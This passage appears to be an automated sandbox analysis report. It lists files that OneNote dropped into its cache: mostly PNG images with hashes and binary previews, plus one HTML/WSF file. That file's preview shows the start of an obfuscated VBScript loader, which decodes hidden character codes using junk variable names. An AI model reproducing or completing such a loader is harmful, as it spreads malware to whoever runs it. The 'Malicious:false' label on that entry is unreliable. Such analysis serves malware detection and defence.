                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004L.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004M.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004N.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004O.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004P.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004Q.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004R.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004S.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004T.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004U.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000051.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55113
                                                                                                                                                                                                                  Entropy (8bit):5.216959514455489
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                                  MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                                  SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                                  SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                                  SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):567
                                                                                                                                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                                                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                                                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                                                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                                                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000053.bin (copy)

                                                                                                                                                                                                                  Download File
